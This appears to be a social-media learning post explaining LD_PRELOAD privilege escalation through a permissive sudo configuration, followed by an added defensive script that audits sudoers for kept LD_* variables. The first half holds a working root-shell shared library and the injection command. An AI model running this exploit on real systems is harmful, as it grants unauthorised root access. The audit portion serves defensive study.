🛠️ The Security Auditor's Toolkit: LD_PRELOAD
The core of this exploit lies in the way Linux handles dynamic linking. When you run a dynamically linked program, the loader resolves the shared libraries it needs before main() runs. LD_PRELOAD tells the loader: "Load my library first," so that library's initialisation code runs inside the process before the program's own code.
1. The Vulnerability
If sudo -l shows that you can run a command, and sudo's configuration lets the LD_PRELOAD environment variable pass through without being reset or restricted, you can inject your own code into a root process.
2. Crafting the Malicious Library
I practiced writing a simple C wrapper that executes as soon as the library is initialized:
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
#include <unistd.h>   // declares setuid() and setgid()

// Runs when the loader initialises the library, before the target's main()
void _init() {
    setuid(0);           // Set User ID to Root
    setgid(0);           // Set Group ID to Root
    system("/bin/bash"); // Spawn the shell
}
3. The Injection
After compiling the library with gcc -fPIC -shared, the escalation is just one command away:
sudo LD_PRELOAD=/tmp/root.so <any_allowed_command>
Because the _init() function runs while the loader initialises the library, before the allowed command's own code starts, the system spawns a root shell immediately.
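As an added example (not from the original post), here is a defender-side check for the condition in step 1: it reads sudoers text or sudo -l output and lists every LD_* variable that sudo would keep, next to a corrected sudoers fragment. sudo removes LD_* variables by default, so this weakness normally exists only because LD_PRELOAD was explicitly added to env_keep; the sudoers lines, user name and host name below are constructed.

```sh
#!/bin/sh
# Added example (not from the original post): audit sudoers text, or the output
# of `sudo -l`, for env_keep entries that preserve dynamic-linker variables.
# All sample content below is constructed for the demonstration.

# Constructed sudoers fragment with the weak setting.
WEAK_SUDOERS='Defaults env_reset
Defaults env_keep += "LANG LC_ALL"
Defaults env_keep += "LD_PRELOAD LD_LIBRARY_PATH"
# Defaults env_keep += "LD_DEBUG"     (commented out, must be ignored)
%wheel ALL=(ALL) ALL'

# Corrected fragment: keep env_reset and never list LD_* in env_keep.
SAFE_SUDOERS='Defaults env_reset
Defaults env_keep += "LANG LC_ALL"
Defaults env_keep -= "LD_PRELOAD"
%wheel ALL=(ALL) ALL'

# Constructed `sudo -l` output, where the same setting appears comma-separated.
WEAK_SUDO_L='Matching Defaults entries for alice on host:
    env_reset, env_keep+=LD_PRELOAD, secure_path=/usr/sbin:/usr/bin:/sbin:/bin'

# Reads sudoers or `sudo -l` text on stdin. Prints each LD_* name that is kept
# and returns 1; returns 0 (printing nothing) when none is kept.
# Handles comment lines, quoted space-separated lists and bare single values,
# and ignores `env_keep -=` lines, which remove variables rather than keep them.
find_unsafe_env_keep() {
    grep -v '^[[:space:]]*#' \
      | grep -oE 'env_keep[[:space:]]*[+]?=[[:space:]]*("[^"]*"|[^ ,]+)' \
      | sed -E 's/^env_keep[[:space:]]*[+]?=[[:space:]]*//; s/"//g' \
      | tr ' ' '\n' \
      | grep -E '^LD_' || return 0
    return 1
}

# Stand-alone run: report on each constructed sample.
for name in WEAK_SUDOERS SAFE_SUDOERS WEAK_SUDO_L; do
    eval "text=\$$name"
    if printf '%s\n' "$text" | find_unsafe_env_keep; then
        echo "$name: no LD_* variables kept by sudo"
    else
        echo "$name: LD_* variables above survive env_reset; remove them and check with visudo -c"
    fi
done
```

On a real host, run sudo -l | find_unsafe_env_keep as the user in question, or feed it /etc/sudoers and the files under /etc/sudoers.d.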
Follow my journey: #1HourADayJourney